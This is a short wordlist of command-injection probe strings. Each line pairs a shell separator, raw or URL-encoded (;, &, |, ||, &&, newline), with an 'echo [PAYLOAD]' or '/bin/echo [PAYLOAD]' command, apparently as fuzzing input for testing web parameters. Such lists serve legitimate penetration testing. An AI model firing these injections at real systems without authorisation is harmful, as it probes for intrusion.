echo [PAYLOAD]
%20echo [PAYLOAD]
;echo [PAYLOAD]
&echo [PAYLOAD]
|echo [PAYLOAD]
||echo [PAYLOAD]
&&echo [PAYLOAD]
%0aecho [PAYLOAD]
%3becho [PAYLOAD]
%26echo [PAYLOAD]
%26%26echo [PAYLOAD]
%7Cecho [PAYLOAD]
%7C%7Cecho [PAYLOAD]
/bin/echo [PAYLOAD]
%20/bin/echo [PAYLOAD]
;/bin/echo [PAYLOAD]
&/bin/echo [PAYLOAD]
|/bin/echo [PAYLOAD]
||/bin/echo [PAYLOAD]
&&/bin/echo [PAYLOAD]
%0a/bin/echo [PAYLOAD]
%3b/bin/echo [PAYLOAD]
%26/bin/echo [PAYLOAD]
%26%26/bin/echo [PAYLOAD]
%7C/bin/echo [PAYLOAD]
%7C%7C/bin/echo [PAYLOAD]